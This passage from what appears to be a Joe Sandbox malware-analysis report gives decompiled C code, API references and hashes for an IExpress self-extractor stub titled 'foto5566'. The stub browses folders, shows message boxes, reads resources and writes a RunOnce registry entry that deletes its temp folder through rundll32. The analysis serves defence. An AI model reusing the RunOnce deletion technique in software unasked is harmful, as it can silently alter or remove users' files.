				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E009344B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x9388c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x9387a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x938598;
					_v36 = 1;
					_v32 = E00934200;
					_v28 = 0x9388c0;
					 *0x93a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x93a288(_t32, 0x9388c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x9388c0 != 0) {
							E00931680(0x9387a0, 0x104, 0x9388c0);
						}
						 *0x93a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x9387a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x9388c0);
					_t61 = 0x9388c0;
					_t4 =  &(_t61[1]); // 0x9388c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x9388c0; // 0x1271181
					_t44 = CharPrevA(0x9388c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x9388c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00934234
0x0093423c
0x00934240
0x009343b2
0x009343b7
0x009343c0
0x00000000
0x009343c5
0x0093424c
0x00934252
0x00934257
0x009343a4
0x009343a5
0x009343ab
0x00000000
0x009343ab
0x00934263
0x00934269
0x0093426e
0x00000000
0x00000000
0x0093427a
0x00934280
0x00934285
0x00000000
0x00000000
0x0093428d
0x00934293
0x009342e6
0x009342e9
0x009342ef
0x009342f4
0x009342f7
0x00934300
0x00934307
0x0093430e
0x00934315
0x0093431c
0x00934322
0x00934326
0x0093432d
0x0093432d
0x0093432f
0x00934334
0x00934343
0x00934349
0x0093434d
0x00934354
0x00934354
0x0093435d
0x0093436e
0x0093436e
0x0093437d
0x00934383
0x00934387
0x0093438e
0x0093438e
0x00934387
0x00934391
0x00934399
0x00000000
0x00934295
0x0093429f
0x009342a5
0x009342aa
0x009342aa
0x009342ad
0x009342ad
0x009342af
0x009342b0
0x009342b6
0x009342c2
0x009342c8
0x009342ce
0x009342e4
0x009342e4
0x00000000
0x009342ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00934236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0093424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00934263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0093427A
GetTempPathA.KERNEL32(00000104,009388C0,?,00000001), ref: 0093429F
CharPrevA.USER32(009388C0,01271181,?,00000001), ref: 009342C2
CharPrevA.USER32(009388C0,00000000,?,00000001), ref: 009342D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00934391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 009343A5

Strings

SHGetPathFromIDList, xrefs: 00934274
SHELL32.DLL, xrefs: 0093422F
SHBrowseForFolder, xrefs: 00934246

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 8e4c1d5993c22c6c69df9c9510de9a4b09e231e43f282e0a6a8a28f3c4a7d619
Instruction ID: d16972de31ad1a3fa9cef616bd8e2a63682b2ca338d71c93d17add539d1567c3
Opcode Fuzzy Hash: 8e4c1d5993c22c6c69df9c9510de9a4b09e231e43f282e0a6a8a28f3c4a7d619
Instruction Fuzzy Hash: FC410678A08304AFD711AFB4DC88AAFBBB9EB45344F050169F991A3351CB759C01DF62

Uniqueness

Uniqueness Score: -1.00%

Function 009344B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E009344B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x938004; // 0x911e09f9
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x938a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x939a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00931680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0093171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0093171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0093681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E009367C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "foto5566", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0093681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E009367C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "foto5566", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00936CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}

0x009344b9
0x009344c4
0x009344cb
0x009344d8
0x009344e4
0x009344eb
0x009344ee
0x009344ef
0x009344ef
0x009344f1
0x009344f7
0x009344f8
0x0093467b
0x009344fe
0x00934509
0x00934518
0x00934525
0x00934562
0x00934568
0x00934568
0x0093456b
0x0093456b
0x0093456d
0x0093456e
0x00934572
0x00934578
0x0093457c
0x009345cb
0x00934607
0x00934607
0x0093460d
0x00934613
0x00934617
0x00000000
0x0093461d
0x00934623
0x00934626
0x00934628
0x00000000
0x00934628
0x009345cd
0x009345cd
0x009345cf
0x009345cf
0x009345d2
0x009345d2
0x009345d4
0x009345d5
0x009345db
0x009345de
0x009345e3
0x009345e9
0x009345ed
0x00000000
0x009345f3
0x009345fd
0x00000000
0x00934602
0x009345ed
0x0093457e
0x0093457e
0x00934580
0x00934580
0x00934583
0x00934583
0x00934585
0x00934586
0x0093458a
0x0093458c
0x0093458f
0x0093458f
0x00934591
0x00934592
0x0093459b
0x0093459e
0x009345a3
0x009345a9
0x009345ad
0x00000000
0x009345af
0x009345af
0x009345bf
0x0093462d
0x00934630
0x0093463d
0x0093464e
0x0093464e
0x0093463f
0x00934640
0x00934647
0x0093464c
0x00000000
0x00000000
0x0093464c
0x00934666
0x0093466d
0x0093466f
0x00934675
0x00934675
0x009345ad
0x00934527
0x0093452e
0x0093453f
0x0093453f
0x00934530
0x00934531
0x00934538
0x0093453d
0x00000000
0x00000000
0x0093453d
0x00934554
0x0093455a
0x0093455a
0x0093455a
0x00934525
0x0093468c

APIs

LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00934518
MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00934554
LocalAlloc.KERNEL32(00000040,00000065), ref: 009345A3
LocalAlloc.KERNEL32(00000040,00000065), ref: 009345E3
LocalAlloc.KERNEL32(00000040,00000002), ref: 0093460D
MessageBeep.USER32(00000000), ref: 00934630
MessageBoxA.USER32(?,00000000,foto5566,00000000), ref: 00934666
LocalFree.KERNEL32(00000000), ref: 0093466F

Part of subcall function 0093681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0093686E
Part of subcall function 0093681F: GetSystemMetrics.USER32(0000004A), ref: 009368A7
Part of subcall function 0093681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009368CC
Part of subcall function 0093681F: RegQueryValueExA.ADVAPI32(?,00931140,00000000,?,?,0000000C), ref: 009368F4
Part of subcall function 0093681F: RegCloseKey.ADVAPI32(?), ref: 00936902

Strings

LoadString() Error. Could not load string resource., xrefs: 009344E4
foto5566, xrefs: 00934545, 0093465A

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
String ID: LoadString() Error. Could not load string resource.$foto5566
API String ID: 3244514340-742867950
Opcode ID: 3b970b3a3a28c70f9ae0d435ba5dd911ed2331c457d24321cfe29bdf8d5a08f0
Instruction ID: aeae0e38fbc9222794fcfaafe2771b63a35037f83b244a8c941fc88543f45d2a
Opcode Fuzzy Hash: 3b970b3a3a28c70f9ae0d435ba5dd911ed2331c457d24321cfe29bdf8d5a08f0
Instruction Fuzzy Hash: 21511472904219AFDB219F68CC49BBA7B78EF85304F054194FD49A7241DB71EE05DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00932773 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 114
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00932773(CHAR* __ecx, char* _a4) {
				signed int _v8;
				char _v268;
				char _v269;
				CHAR* _v276;
				int _v280;
				void* _v284;
				int _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				intOrPtr _t34;
				int _t45;
				int* _t50;
				CHAR* _t52;
				CHAR* _t61;
				char* _t62;
				int _t63;
				CHAR* _t64;
				signed int _t65;

				_t52 = __ecx;
				_t23 =  *0x938004; // 0x911e09f9
				_v8 = _t23 ^ _t65;
				_t62 = _a4;
				_t50 = 0;
				_t61 = __ecx;
				_v276 = _t62;
				 *((char*)(__ecx)) = 0;
				if( *_t62 != 0x23) {
					_t63 = 0x104;
					goto L14;
				} else {
					_t64 = _t62 + 1;
					_v269 = CharUpperA( *_t64);
					_v276 = CharNextA(CharNextA(_t64));
					_t63 = 0x104;
					_t34 = _v269;
					if(_t34 == 0x53) {
						L14:
						GetSystemDirectoryA(_t61, _t63);
						goto L15;
					} else {
						if(_t34 == 0x57) {
							GetWindowsDirectoryA(_t61, 0x104);
							goto L16;
						} else {
							_push(_t52);
							_v288 = 0x104;
							E00931781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
							_t59 = 0x104;
							E0093658A( &_v268, 0x104, _v276);
							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
								L16:
								_t59 = _t63;
								E0093658A(_t61, _t63, _v276);
							} else {
								if(RegQueryValueExA(_v284, 0x931140, 0,  &_v280, _t61,  &_v288) == 0) {
									_t45 = _v280;
									if(_t45 != 2) {
										L9:
										if(_t45 == 1) {
											goto L10;
										}
									} else {
										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
											_t45 = _v280;
											goto L9;
										} else {
											_t59 = 0x104;
											E00931680(_t61, 0x104,  &_v268);
											L10:
											_t50 = 1;
										}
									}
								}
								RegCloseKey(_v284);
								L15:
								if(_t50 == 0) {
									goto L16;
								}
							}
						}
					}
				}
				return E00936CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
			}

0x00932773
0x0093277e
0x00932785
0x0093278a
0x0093278d
0x00932790
0x00932792
0x00932798
0x0093279d
0x009328b2
0x00000000
0x009327a3
0x009327a3
0x009327af
0x009327c2
0x009327c8
0x009327cd
0x009327d5
0x009328b7
0x009328b9
0x00000000
0x009327db
0x009327dd
0x009328aa
0x00000000
0x009327e3
0x009327e3
0x009327ec
0x009327f8
0x00932803
0x0093280b
0x00932831
0x009328c3
0x009328c9
0x009328cd
0x00932837
0x0093285a
0x0093285c
0x00932865
0x00932892
0x00932895
0x00000000
0x00000000
0x00932867
0x00932878
0x0093288c
0x00000000
0x0093287a
0x00932880
0x00932885
0x00932897
0x00932899
0x00932899
0x00932878
0x00932865
0x009328a0
0x009328bf
0x009328c1
0x00000000
0x00000000
0x009328c1
0x00932831
0x009327dd
0x009327d5
0x009328e5

APIs

CharUpperA.USER32(911E09F9,00000000,00000000,00000000), ref: 009327A8
CharNextA.USER32(0000054D), ref: 009327B5
CharNextA.USER32(00000000), ref: 009327BC
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00932829
RegQueryValueExA.ADVAPI32(?,00931140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00932852
ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00932870
RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009328A0
GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 009328AA
GetSystemDirectoryA.KERNEL32 ref: 009328B9

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 009327E4

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 10a61d46d830b68f15641e0b9ef86cf4b6cae8456a85574a61444eea3c869913
Instruction ID: 4ab5663ecd9fb43c02aa9f0d0d91aaa21967cc6d17b48c456ad2904c489c73a9
Opcode Fuzzy Hash: 10a61d46d830b68f15641e0b9ef86cf4b6cae8456a85574a61444eea3c869913
Instruction Fuzzy Hash: D1419371A1812CAFDB249B649C85AFA77BDEF55700F0040A9F689D2110DB708E859FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00933100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00933100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x938590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x938590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E009343D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x938d4c);
					SetWindowTextA(_t33, "foto5566");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x9388b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E009330C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}

0x00933108
0x0093310b
0x009331b7
0x009331ca
0x009331d0
0x009331d0
0x009331da
0x00000000
0x009331da
0x00933111
0x00933114
0x00933136
0x00933136
0x00933138
0x0093313b
0x00933141
0x00000000
0x00933143
0x00933116
0x0093311b
0x0093314b
0x00933151
0x00933158
0x0093316a
0x00933176
0x0093317d
0x0093318b
0x0093319e
0x009331a3
0x00000000
0x009331ad
0x00933120
0x00000000
0x00000000
0x0093312a
0x00933134
0x00000000
0x00000000
0x00000000
0x00933134
0x0093312c
0x00000000

APIs

EndDialog.USER32(?,00000000), ref: 0093313B
GetDesktopWindow.USER32 ref: 0093314B
SetDlgItemTextA.USER32(?,00000834), ref: 0093316A
SetWindowTextA.USER32(?,foto5566), ref: 00933176
SetForegroundWindow.USER32(?), ref: 0093317D
GetDlgItem.USER32(?,00000834), ref: 00933185
GetWindowLongA.USER32(00000000,000000FC), ref: 00933190
SetWindowLongA.USER32(00000000,000000FC,009330C0), ref: 009331A3
SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 009331CA

Strings

foto5566, xrefs: 00933170

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: foto5566
API String ID: 3785188418-645582358
Opcode ID: 0ebcb86c3ad6b18fc99fbc5acb39b3ce2d39d48222806697cd4a433c088b0729
Instruction ID: 7f01104a2cac2d125a311a81b4ff9e72f6263ab466d5e06835f85c3d6c3f7975
Opcode Fuzzy Hash: 0ebcb86c3ad6b18fc99fbc5acb39b3ce2d39d48222806697cd4a433c088b0729
Instruction Fuzzy Hash: 3711D33129C211BBDB119FA49C0CBAB3AA8FB5A721F108610F865D51E0DBB49641EF46

Uniqueness

Uniqueness Score: -1.00%

Function 00932267 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00932267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x938004; // 0x911e09f9
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x938530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, 0x938530, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0093658A( &_v268, 0x104, 0x931140);
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
							E0093171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, 0x938530, 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00936CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}

0x00932272
0x00932277
0x00932279
0x00932283
0x00932289
0x009322ab
0x009322b1
0x009322c4
0x009322e0
0x009322e6
0x009322f5
0x0093230d
0x0093231c
0x0093231c
0x00932321
0x0093233a
0x00932342
0x00932348
0x0093234b
0x0093234c
0x0093234c
0x0093234e
0x0093234f
0x0093236e
0x0093236e
0x0093237a
0x00932380
0x00932380
0x00932381
0x00932381
0x0093238f

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 009322A3
RegQueryValueExA.ADVAPI32(?,00938530,00000000,00000000,?,?,00000001), ref: 009322D8
memset.MSVCRT ref: 009322F5
GetSystemDirectoryA.KERNEL32 ref: 00932305
RegSetValueExA.ADVAPI32(?,00938530,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0093236E
RegCloseKey.ADVAPI32(?), ref: 0093237A

Strings

Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00932299
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0093232D
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00932321

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Value$CloseDirectoryOpenQuerySystemmemset
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
API String ID: 3027380567-530634419
Opcode ID: 8d12a19f194b2c685f560ceaa7929634a1ddd8c2aed7cb29802e57a1e615d517
Instruction ID: 1f58791814c5632894efcb5698bb89560546b3159128a944d44012f578b989ad
Opcode Fuzzy Hash: 8d12a19f194b2c685f560ceaa7929634a1ddd8c2aed7cb29802e57a1e615d517
Instruction Fuzzy Hash: 9C31E671A04218ABDB259B60DC89FEBBB7CEF55704F0001E9F58DA6050EA71AF88CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0093468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0093468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00934699
0x0093469b
0x009346a9
0x009346af
0x009346b4
0x009346bc
0x009346f9
0x00000000
0x009346f9
0x009346d9
0x009346dd
0x00000000
0x00000000
0x009346e5
0x009346ef
0x00000000
0x009346f5
0x009346ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346A0
SizeofResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009346C3
LoadResource.KERNEL32(00000000,00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346CC
LockResource.KERNEL32(00000000,?,00932D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009346D3
memcpy_s.MSVCRT ref: 009346E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009346EF

Strings

TITLE, xrefs: 0093469D, 009346C0
foto5566, xrefs: 009346E4

Memory Dump Source

Source File: 00000005.00000002.798408656.0000000000931000.00000020.00000001.01000000.00000006.sdmp, Offset: 00930000, based on PE: true

Associated: 00000005.00000002.798382883.0000000000930000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798447613.0000000000938000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.798500963.000000000093C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_930000_6F2B.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$foto5566
API String ID: 3370778649-3539812973
Opcode ID: 9d2336d4df7b005bcaa067e23659de390d3a45fbbf36443bb87045f645b479b3
Instruction ID: 90cb2d75060c767ef3d6ee58e08e468c6476e954985a6f78506c52a7e327de77
Opcode Fuzzy Hash: 9d2336d4df7b005bcaa067e23659de390d3a45fbbf36443bb87045f645b479b3
Instruction Fuzzy Hash: DE01A4362482107BE3201BA56C4EF6B7E2CDBCAF66F050014FA8997191C9B19C419EB6

Uniqueness

Uniqueness Score: -1.00%

Function 009317EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E009317EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

